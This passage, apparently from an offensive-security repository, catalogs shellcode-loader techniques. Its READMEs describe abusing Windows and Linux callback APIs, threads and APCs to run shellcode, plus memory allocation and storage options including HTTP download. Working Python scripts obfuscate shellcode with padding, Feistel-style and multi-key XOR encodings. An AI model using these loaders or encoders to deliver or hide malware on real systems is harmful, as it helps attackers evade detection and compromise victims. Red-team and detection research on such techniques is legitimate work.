```

### Reference

- [Man 3](https://man7.org/linux/man-pages/man3/nftw.3.html)

--------------------------------------------------------------------------------
/windows/execution/callback/EnumFonts/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `EnumFonts`.
```c++
int EnumFontsA (HDC hdc, LPCSTR lpLogfont, FONTENUMPROCA lpProc, LPARAM lParam);

int EnumFontsW (HDC hdc, LPCWSTR lpLogfont, FONTENUMPROCW lpProc, LPARAM lParam);

HDC GetDC (HWND hWnd);
```

### Reference

- [MSDN EnumFontsA](https://docs.microsoft.com/en-us/windows/win32/api/wingdi/nf-wingdi-enumfontsa)
- [MSDN EnumFontsW](https://docs.microsoft.com/en-us/windows/win32/api/wingdi/nf-wingdi-enumfontsw)
- [MSDN GetDC](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getdc)

--------------------------------------------------------------------------------
/windows/storage/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

### Overview

`storage` techniques are the techniques used to hold the shellcode before it is run in memory. The shellcode can be embedded inside the loader itself, or it can live outside the loader, in which case it has to be fetched first.

### Catalog

Some of the `storage` techniques implemented:

- [download-http](download-http): download the shellcode over HTTP
- [global](global): store the shellcode in the global area
- [resource](resource): store the shellcode in the resource section
- [section](section): store the shellcode as a separate section
- [stack](stack): store the shellcode on a function's stack

--------------------------------------------------------------------------------
/linux/execution/callback/qsort/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `qsort` (glibc).

`qsort` sorts the elements of an array using the quick sort algorithm.
```c++
#include <stdlib.h>

typedef int (*callback_t)(const void *, const void *);

void qsort(void * base, size_t length, size_t size, callback_t comparator);
```

During sorting, the comparator callback is invoked for every comparison of two elements. This callback can be abused to execute shellcode.

### Reference

- [Man 3](https://man7.org/linux/man-pages/man3/qsort.3.html)

--------------------------------------------------------------------------------
/linux/allocation/valloc/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Allocate memory for executing shellcode later.

### Overview

Allocation using `valloc`. The `valloc` function allocates a memory block that starts at a page-aligned address (a multiple of the page size). Technically, `valloc` is equivalent to `memalign(sysconf(_SC_PAGESIZE), size)`.

`valloc` is similar to `pvalloc` (from `malloc.h`). The difference is that `pvalloc` rounds the requested size up to a multiple of the page size.

Note that `valloc` is legacy and has been superseded by `aligned_alloc`.

```c++
#include <stdlib.h>

void * valloc(size_t size);
```

### Reference

- [Man 3](https://linux.die.net/man/3/valloc)

--------------------------------------------------------------------------------
/windows/writing/encryption/block/blowfish/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Shellcode encryption.

### Overview

`Blowfish` encryption with an in-house implementation, without using any third-party API.

`Blowfish` is a block cipher whose key size ranges from 32-bit up to 448-bit. The example implementation uses a 128-bit key.
### References

- [Reversing.ID Blowfish Reference](https://github.com/ReversingID/Crypto-Reference/tree/master/References/Modern/Block-Cipher/Blowfish)
- [Reversing.ID Blowfish Code](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/BlowFish/code.c)
- [Wikipedia Blowfish](https://en.wikipedia.org/wiki/Blowfish_(cipher))

--------------------------------------------------------------------------------
/windows/writing/encryption/block/cipherunicorn-a/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Shellcode encryption

### Overview

`CIPHERUNICORN-A` encryption with an in-house implementation, without using any third-party API.

`CIPHERUNICORN-A` offers several key sizes, but the example implementation uses a 128-bit key.

### References

- [Reversing.ID CIPHERUNICORN-A Reference](https://github.com/ReversingID/Crypto-Reference/blob/master/References/Modern/Block-Cipher/CIPHERUNICORN-A)
- [Reversing.ID CIPHERUNICORN-A Code](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/CIPHERUNICORN-A/code.c)
- [Wikipedia CIPHERUNICORN-A](https://en.wikipedia.org/wiki/CIPHERUNICORN-A)

--------------------------------------------------------------------------------
/windows/execution/callback/CryptVerifyMessageSignature/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `CryptVerifyMessageSignature`.
```c++
BOOL CryptVerifyMessageSignature (PCRYPT_VERIFY_MESSAGE_PARA pVerifyPara, DWORD dwSignerIndex, const BYTE *pbSignedBlob, DWORD cbSignedBlob, BYTE *pbDecoded, DWORD *pcbDecoded, PCCERT_CONTEXT *ppSignerCert);
```

### Reference

- [MSDN CryptVerifyMessageSignature](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptverifymessagesignature)
- [MSDN structure CRYPT_VERIFY_MESSAGE_PARA](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/ns-wincrypt-crypt_verify_message_para)

--------------------------------------------------------------------------------
/windows/execution/callback/DPA_DestroyCallback/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `DPA_DestroyCallback`.

```c++
void DPA_DestroyCallback (HDPA hdpa, PFNDAENUMCALLBACK pfnCB, void *pData);

HDPA DPA_Create (int cItemGrow);

int DPA_InsertPtr (HDPA hdpa, int i, void *p);
```

### Reference

- [MSDN DPA_DestroyCallback](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dpa_destroycallback)
- [MSDN DPA_Create](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dpa_create)
- [MSDN DPA_InsertPtr](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dpa_insertptr)

--------------------------------------------------------------------------------
/linux/execution/callback/bsearch/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `bsearch` (glibc).

`bsearch` searches for an element in a sorted array using the binary search algorithm.
```c++
#include <stdlib.h>

typedef int (*callback_t)(const void *, const void *);

void* bsearch(const void *key, const void * base, size_t length, size_t size, callback_t comparator);
```

During the search, the comparator callback is invoked for every element that is examined. This callback can be abused to execute shellcode.

### Reference

- [Man 3](https://man7.org/linux/man-pages/man3/bsearch.3.html)

--------------------------------------------------------------------------------
/windows/execution/callback/CopyFileEx/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `CopyFileEx`.

```c++
BOOL CopyFileExA (LPCSTR lpExistingFileName, LPCSTR lpNewFileName, LPPROGRESS_ROUTINE lpProgressRoutine, LPVOID lpData, LPBOOL pbCancel, DWORD dwCopyFlags);

BOOL CopyFileExW (LPCWSTR lpExistingFileName, LPCWSTR lpNewFileName, LPPROGRESS_ROUTINE lpProgressRoutine, LPVOID lpData, LPBOOL pbCancel, DWORD dwCopyFlags);
```

### Reference

- [MSDN CopyFileExA](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-copyfileexa)
- [MSDN CopyFileExW](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-copyfileexw)

--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceLanguages/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `EnumResourceLanguages`.

```c++
BOOL EnumResourceLanguagesA(HMODULE hModule, LPCSTR lpType, LPCSTR lpName, ENUMRESLANGPROCA lpEnumFunc, LONG_PTR lParam);

BOOL EnumResourceLanguagesW(HMODULE hModule, LPCWSTR lpType, LPCWSTR lpName, ENUMRESLANGPROCW lpEnumFunc, LONG_PTR lParam);
```

### Reference

- [MSDN EnumResourceLanguagesA](https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-enumresourcelanguagesa)
- [MSDN EnumResourceLanguagesW](https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-enumresourcelanguagesw)
--------------------------------------------------------------------------------
/windows/writing/encryption/block/anubis/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Shellcode encryption.

### Overview

`Anubis` encryption with a self-written implementation, without using any third-party API.

`Anubis` is a block cipher that was one of the contestants in the NESSIE project. The algorithm supports several key sizes, but the example implementation uses a 128-bit key.

### References

- [Reversing.ID Anubis Reference](https://github.com/ReversingID/Crypto-Reference/tree/master/References/Modern/Block-Cipher/Anubis)
- [Reversing.ID Anubis Code](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/Anubis/code.c)
- [Wikipedia Anubis](https://en.wikipedia.org/wiki/Anubis_(cipher))
--------------------------------------------------------------------------------
/linux/execution/event/pthread_atfork/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Executing shellcode at fork.

### Overview

Register the shellcode as a `pthread_atfork` handler so that it runs automatically whenever a fork occurs.

```c++
#include <pthread.h>

typedef void (*callback_t)(void);

int pthread_atfork(callback_t prepare, callback_t parent, callback_t child);
```

Three handlers can be used:
- prepare: runs in the parent process just before the `fork` takes place.
- parent: runs in the parent process after the `fork` completes.
- child: runs in the child process after the `fork` completes.

### Reference

- [Man 3](https://man7.org/linux/man-pages/man3/pthread_atfork.3.html)
--------------------------------------------------------------------------------
/windows/writing/custom/printable/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Transform the shellcode with custom algorithm.

### Overview

Transform the shellcode into a sequence of printable ASCII characters, i.e. bytes in the range `0x20` to `0x7F`.

The algorithm works by splitting each byte into two 4-bit nibbles, `L (Left)` and `R (Right)`, so that `B = L(B)<<4 | R(B)`.

`L` and `R` are then each mapped into the printable ASCII range by using the nibble as the low nibble and an arbitrary value (0x2 - 0x6) as the high nibble.

Example:

```
B = 0x37
L = 0x3
R = 0x7
B = 0x3<<4 | 0x7 = 0x37

encoded = 0x23 0x47
```

As a result, the encoded shellcode is twice its original size.

--------------------------------------------------------------------------------
/windows/execution/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

### Overview

`execution` techniques are the techniques for running shellcode, either directly or indirectly.

Execution techniques can be divided into several categories according to how the execution is triggered:

- [asm-jmp](asm-jmp): jump directly to the shellcode address using an assembly instruction.
- [callback](callback): abuse an API to invoke the shellcode as a callback.
- [event](event): take advantage of an event trigger.
- [exception](exception): abuse the exception handling system.
- [fiber](fiber): run the shellcode as a new fiber.
- [invoke](invoke): run the shellcode directly without an API.
- [thread](thread): run the shellcode as a new thread.

--------------------------------------------------------------------------------
/windows/writing/encryption/block/safer/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Shellcode encryption.

### Overview

`SAFER+` encryption (from the SAFER family) with a self-written implementation, without using any third-party API.

`SAFER` is a block cipher that was one of the contestants in the NESSIE project. The algorithm supports several key sizes, but the example implementation uses a 128-bit key.

### References

- [Reversing.ID SAFER Reference](https://github.com/ReversingID/Crypto-Reference/tree/master/References/Modern/Block-Cipher/SAFER)
- [Reversing.ID SAFER Code](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/SAFER/code.c)
- [Wikipedia SAFER](https://en.wikipedia.org/wiki/SAFER_(cipher))
--------------------------------------------------------------------------------
/windows/execution/callback/DSA_DestroyCallback/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `DSA_DestroyCallback`.

```c++
void DSA_DestroyCallback (HDSA hdsa, PFNDAENUMCALLBACK pfnCB, void *pData);

HDSA DSA_Create (int cbItem, int cItemGrow);

int DSA_InsertItem (HDSA hdsa, int i, const void *pitem);
```

### Reference

- [MSDN DSA_DestroyCallback](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dsa_destroycallback)
- [MSDN DSA_Create](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dsa_create)
- [MSDN DSA_InsertItem](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dsa_insertitem)
--------------------------------------------------------------------------------
/windows/execution/callback/SymFindFileInPath/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `SymFindFileInPath`.

```c++
BOOL IMAGEAPI SymFindFileInPath ( HANDLE hprocess, PCSTR SearchPath, PCSTR FileName, PVOID id, DWORD two, DWORD three, DWORD flags, PSTR FoundFile, PFINDFILEINPATHCALLBACK callback, PVOID context);

BOOL IMAGEAPI SymSrvGetFileIndexInfo (PCSTR File, PSYMSRV_INDEX_INFO Info, DWORD Flags);
```

### Reference

- [MSDN SymFindFileInPath](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-symfindfileinpath)
- [MSDN SymSrvGetFileIndexInfo](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-symsrvgetfileindexinfo)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumFontFamilies/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `EnumFontFamilies`.

```c++
int EnumFontFamiliesA (HDC hdc, LPCSTR lpLogfont, FONTENUMPROCA lpProc, LPARAM lParam);

int EnumFontFamiliesW (HDC hdc, LPCWSTR lpLogfont, FONTENUMPROCW lpProc, LPARAM lParam);

HDC GetDC (HWND hWnd);
```

### Reference

- [MSDN EnumFontFamiliesA](https://docs.microsoft.com/en-us/windows/win32/api/wingdi/nf-wingdi-enumfontfamiliesa)
- [MSDN EnumFontFamiliesW](https://docs.microsoft.com/en-us/windows/win32/api/wingdi/nf-wingdi-enumfontfamiliesw)
- [MSDN GetDC](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getdc)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceTypes/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `EnumResourceTypes`.

Enumerate the resource types inside a module and run the callback to process each resource type that is found.

```c++
BOOL EnumResourceTypesA (HMODULE hModule, ENUMRESTYPEPROCA lpEnumFunc, LONG_PTR lParam);

BOOL EnumResourceTypesW (HMODULE hModule, ENUMRESTYPEPROCW lpEnumFunc, LONG_PTR lParam);
```

### Reference

- [MSDN EnumResourceTypesA](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-enumresourcetypesa)
- [MSDN EnumResourceTypesW](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-enumresourcetypesw)
--------------------------------------------------------------------------------
/windows/execution/callback/CreatePropertySheetPage/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `CreatePropertySheetPage`.

```c++
HPROPSHEETPAGE CreatePropertySheetPageA (LPCPROPSHEETPAGEA constPropSheetPagePointer);

HPROPSHEETPAGE CreatePropertySheetPageW (LPCPROPSHEETPAGEW constPropSheetPagePointer);
```

### Reference

- [MSDN CreatePropertySheetPageA](https://docs.microsoft.com/en-us/windows/win32/api/prsht/nf-prsht-createpropertysheetpagea)
- [MSDN CreatePropertySheetPageW](https://docs.microsoft.com/en-us/windows/win32/api/prsht/nf-prsht-createpropertysheetpagew)
- [MSDN structure PROPSHEETPAGE](https://docs.microsoft.com/en-us/windows/win32/controls/pss-propsheetpage)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumLanguageGroupLocales/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `EnumLanguageGroupLocales`.

```c++
BOOL EnumLanguageGroupLocalesA (LANGGROUPLOCALE_ENUMPROCA lpLangGroupLocaleEnumProc, LGRPID LanguageGroup, DWORD dwFlags, LONG_PTR lParam);

BOOL EnumLanguageGroupLocalesW (LANGGROUPLOCALE_ENUMPROCW lpLangGroupLocaleEnumProc, LGRPID LanguageGroup, DWORD dwFlags, LONG_PTR lParam);
```

### Reference

- [MSDN EnumLanguageGroupLocalesA](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumlanguagegrouplocalesa)
- [MSDN EnumLanguageGroupLocalesW](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumlanguagegrouplocalesw)
--------------------------------------------------------------------------------
/windows/writing/custom/padding-dynamic/c++/generate.py:
--------------------------------------------------------------------------------
# read shellcode from `shellcode.bin` and
# generate the encoded shellcode

import random

with open("shellcode.bin", "rb") as f:
    shcode = f.read()
shlen = len(shcode)

# encode the shellcode: each chunk is prefixed with its length byte
idx = 0
enc_shcode = []

while idx < shlen:
    # generate padding number in the range of (2..4)
    pad = random.randrange(2, 5)
    remainder = shlen - idx

    # the last chunk may be shorter than the chosen length
    if pad > remainder:
        pad = remainder

    enc_shcode.append(pad)
    enc_shcode += shcode[idx:idx+pad]
    idx += pad

# print as C-array
print("{ ", end='')
print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='')
print(" }")
print(f"Length: {len(enc_shcode)}")
--------------------------------------------------------------------------------
/windows/execution/callback/DialogBoxIndirectParam/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `DialogBoxIndirectParam`.

```c++
INT_PTR DialogBoxIndirectParamA (HINSTANCE hInstance, LPCDLGTEMPLATEA hDialogTemplate, HWND hWndParent, DLGPROC lpDialogFunc, LPARAM dwInitParam);

INT_PTR DialogBoxIndirectParamW (HINSTANCE hInstance, LPCDLGTEMPLATEW hDialogTemplate, HWND hWndParent, DLGPROC lpDialogFunc, LPARAM dwInitParam);
```

### Reference

- [MSDN DialogBoxIndirectParamA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-dialogboxindirectparama)
- [MSDN DialogBoxIndirectParamW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-dialogboxindirectparamw)
--------------------------------------------------------------------------------
/windows/execution/callback/GetOpenFileName/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `GetOpenFileName`.

```c++
BOOL GetOpenFileNameA (LPOPENFILENAMEA param);

BOOL GetOpenFileNameW (LPOPENFILENAMEW param);
```

### Reference

- [MSDN GetOpenFileNameA](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/nf-commdlg-getopenfilenamea)
- [MSDN GetOpenFileNameW](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/nf-commdlg-getopenfilenamew)
- [MSDN structure OPENFILENAMEA](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-openfilenamea)
- [MSDN structure OPENFILENAMEW](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-openfilenamew)
--------------------------------------------------------------------------------
/windows/execution/callback/GetSaveFileName/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `GetSaveFileName`.

```c++
BOOL GetSaveFileNameA (LPOPENFILENAMEA param);

BOOL GetSaveFileNameW (LPOPENFILENAMEW param);
```

### Reference

- [MSDN GetSaveFileNameA](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/nf-commdlg-getsavefilenamea)
- [MSDN GetSaveFileNameW](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/nf-commdlg-getsavefilenamew)
- [MSDN structure OPENFILENAMEA](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-openfilenamea)
- [MSDN structure OPENFILENAMEW](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-openfilenamew)
--------------------------------------------------------------------------------
/windows/execution/thread/CreateThread/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Executing shellcode as a thread.

### Overview

Execute shellcode with `CreateThread` and wait for it to finish with `WaitForSingleObject`.

```c++
HANDLE CreateThread (LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, __drv_aliasesMem LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId);

DWORD WaitForSingleObject (HANDLE hHandle, DWORD dwMilliseconds);
```

### Reference

- [MSDN CreateThread](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createthread)
- [MSDN WaitForSingleObject](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject)
--------------------------------------------------------------------------------
/windows/writing/custom/feistel/c++/generate.py:
--------------------------------------------------------------------------------
# read shellcode from `shellcode.bin` and
# generate the encoded shellcode

import random

with open("shellcode.bin", "rb") as f:
    shcode = f.read()
shlen = len(shcode)

# generate single byte key
key = random.randrange(1, 255)

# make sure shellcode is even-length
if shlen % 2 == 1:
    shcode += b"\x00"
    shlen += 1

# process in feistel network: the key byte comes first, then each pair
# (l, r) is emitted as (r, l ^ key)
enc_shcode = [key]
idx = 0
while idx < shlen:
    l = shcode[idx]     # LEFT
    r = shcode[idx+1]   # RIGHT

    enc_shcode.append(r)
    enc_shcode.append(l ^ key)
    idx += 2

# print as C-array
print("{ ", end='')
print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='')
print(" }")
--------------------------------------------------------------------------------
/windows/execution/callback/EnumFontFamiliesEx/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `EnumFontFamiliesEx`.

```c++
int EnumFontFamiliesExA(HDC hdc, LPLOGFONTA lpLogfont, FONTENUMPROCA lpProc, LPARAM lParam, DWORD dwFlags);

int EnumFontFamiliesExW(HDC hdc, LPLOGFONTW lpLogfont, FONTENUMPROCW lpProc, LPARAM lParam, DWORD dwFlags);

HDC GetDC (HWND hWnd);
```

### Reference

- [MSDN EnumFontFamiliesExA](https://docs.microsoft.com/en-us/windows/win32/api/wingdi/nf-wingdi-enumfontfamiliesexa)
- [MSDN EnumFontFamiliesExW](https://docs.microsoft.com/en-us/windows/win32/api/wingdi/nf-wingdi-enumfontfamiliesexw)
- [MSDN GetDC](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getdc)
--------------------------------------------------------------------------------
/windows/writing/custom/xor-multikey/c++/generate.py:
--------------------------------------------------------------------------------
# read shellcode from `shellcode.bin` and
# generate the encoded shellcode

import random

# block size, chosen once for the whole shellcode
stride = random.randrange(4,8)

with open("shellcode.bin", "rb") as f:
    shcode = f.read()

nblock = len(shcode) // stride
remainder = len(shcode) % stride
idx_s = 0

# padding: fill the last partial block with NOPs
if remainder != 0:
    shcode = shcode + b"\x90"*(stride - remainder)
    nblock += 1

# header: number of blocks and block size
enc_shcode = [nblock, stride]

# every block gets its own single-byte key, stored in front of the block
for idx_n in range(nblock):
    key = random.randrange(1, 255)

    enc_shcode += [key] + [ c ^ key for c in shcode[idx_s : idx_s + stride]]
    idx_s += stride

# print as C-array
print("{ ", end='')
print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='')
print(" }")
--------------------------------------------------------------------------------
/linux/execution/callback/scandir/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `scandir` (glibc).

The `scandir` function is a POSIX function used to scan the contents of a directory. Two callbacks can be used:

- `filter` to decide whether an entry is eligible / meets the criteria.
- `compare` to sort the entries.

```c++
#include <dirent.h>

typedef int (*cb_filter_t)(const struct dirent *);
typedef int (*cb_compare_t)(const struct dirent **, const struct dirent **);

int scandir (const char * dirp, struct dirent *** result, cb_filter_t filter, cb_compare_t compare);
```

### Reference

- [Man 3](https://man7.org/linux/man-pages/man3/scandir.3.html)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceNames/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `EnumResourceNames`.

Enumerate the resource names of a given type inside a module and run the callback to process each resource that is found.

```c++
BOOL EnumResourceNamesA (HMODULE hModule, LPCSTR lpType, ENUMRESNAMEPROCA lpEnumFunc, LONG_PTR lParam);

BOOL EnumResourceNamesW (HMODULE hModule, LPCWSTR lpType, ENUMRESNAMEPROCW lpEnumFunc, LONG_PTR lParam);
```

### Reference

- [MSDN EnumResourceNamesA](https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-enumresourcenamesa)
- [MSDN EnumResourceNamesW](https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-enumresourcenamesw)
--------------------------------------------------------------------------------
/windows/execution/thread/EtwpCreateEtwThread/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Executing shellcode as a thread.

### Overview

Execute shellcode with `EtwpCreateEtwThread` and wait for it to finish with `WaitForSingleObject`.

`EtwpCreateEtwThread` is an internal, low-level function.

```c++
HANDLE EtwpCreateEtwThread (LPVOID routine, LPVOID param);

DWORD WaitForSingleObject (HANDLE hHandle, DWORD dwMilliseconds);
```

### Reference

- [NTInternals EtwpCreateEtwThread](https://www.geoffchappell.com/studies/windows/win32/ntdll/api/etw/index.htm)
- [MSDN WaitForSingleObject](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject)
- [GIST TheWover](https://gist.github.com/TheWover/b2b2e427d3a81659942f4e8b9a978dc3)
--------------------------------------------------------------------------------
/windows/execution/callback/SetWinEventHook/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `SetWinEventHook`.

```c++
HWINEVENTHOOK SetWinEventHook(DWORD eventMin, DWORD eventMax, HMODULE hmodWinEventProc, WINEVENTPROC pfnWinEventProc, DWORD idProcess, DWORD idThread, DWORD dwFlags);
```

### Reference

- [MSDN SetWinEventHook](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setwineventhook)
- [MSDN GetMessage](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getmessage)
- [MSDN TranslateMessage](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-translatemessage)
- [MSDN DispatchMessage](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-dispatchmessage)
--------------------------------------------------------------------------------
/windows/execution/event/NtQueueApcThread/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Executing shellcode by queueing into APC (Asynchronous Procedure Call).

### Overview

Execute shellcode with `NtQueueApcThread`.

```c++
NTSTATUS NtQueueApcThread (HANDLE ThreadHandle, PIO_APC_ROUTINE ApcRoutine, PVOID ApcRoutineContext, PIO_STATUS_BLOCK ApcStatusBlock, ULONG ApcReserved);

NTSTATUS NtTestAlert();
```

### Reference

- [NTInternals NtQueueApcThread](http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FAPC%2FNtQueueApcThread.html)
- [NTInternals NtTestAlert](http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FAPC%2FNtTestAlert.html)
- [BLOG APC Series: User APC API Low Level Pleasure](https://repnz.github.io/posts/apc/user-apc/)
--------------------------------------------------------------------------------
/windows/execution/callback/CryptDecodeMessage/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `CryptDecodeMessage`.

```c++
BOOL CryptDecodeMessage (DWORD dwMsgTypeFlags, PCRYPT_DECRYPT_MESSAGE_PARA pDecryptPara, PCRYPT_VERIFY_MESSAGE_PARA pVerifyPara, DWORD dwSignerIndex, const BYTE *pbEncodedBlob, DWORD cbEncodedBlob, DWORD dwPrevInnerContentType, DWORD *pdwMsgType, DWORD *pdwInnerContentType, BYTE *pbDecoded, DWORD *pcbDecoded, PCCERT_CONTEXT *ppXchgCert, PCCERT_CONTEXT *ppSignerCert);
```

### Reference

- [MSDN CryptDecodeMessage](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptdecodemessage)
- [MSDN structure CRYPT_VERIFY_MESSAGE_PARA](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/ns-wincrypt-crypt_verify_message_para)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceTypesEx/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `EnumResourceTypesEx`.

Enumerate the resource types inside a module and run the callback to process each resource type that is found.

```c++
BOOL EnumResourceTypesExA (HMODULE hModule, ENUMRESTYPEPROCA lpEnumFunc, LONG_PTR lParam, DWORD dwFlags, LANGID LangId);

BOOL EnumResourceTypesExW (HMODULE hModule, ENUMRESTYPEPROCW lpEnumFunc, LONG_PTR lParam, DWORD dwFlags, LANGID LangId);
```

### Reference

- [MSDN EnumResourceTypesExA](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-enumresourcetypesa)
- [MSDN EnumResourceTypesExW](https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-enumresourcetypesexw)
--------------------------------------------------------------------------------
/windows/allocation/VirtualAlloc/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Allocate memory for executing shellcode later.

### Overview

Allocate with `VirtualAlloc` and release with `VirtualFree`.

```c++
LPVOID VirtualAlloc (LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);

BOOL VirtualProtect (LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect);

BOOL VirtualFree(LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType);
```

### Reference

- [MSDN VirtualAlloc](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualalloc)
- [MSDN VirtualProtect](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualprotect)
- [MSDN VirtualFree](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualfree)

--------------------------------------------------------------------------------
/windows/execution/callback/DPA_EnumCallback/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

